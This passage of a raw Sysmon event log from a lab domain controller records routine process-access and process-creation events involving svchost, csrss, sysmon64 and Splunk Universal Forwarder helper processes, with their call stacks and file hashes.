10341000x80000000000000009102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:48.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.144{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:48.004{59A5CD1D-92B0-6005-BF04-00000000A301}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:49.894{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.894{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:49.895{59A5CD1D-92B1-6005-C104-00000000A301}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:01.909{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000009151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92E8-6005-C204-00000000A301}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:53:44.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYST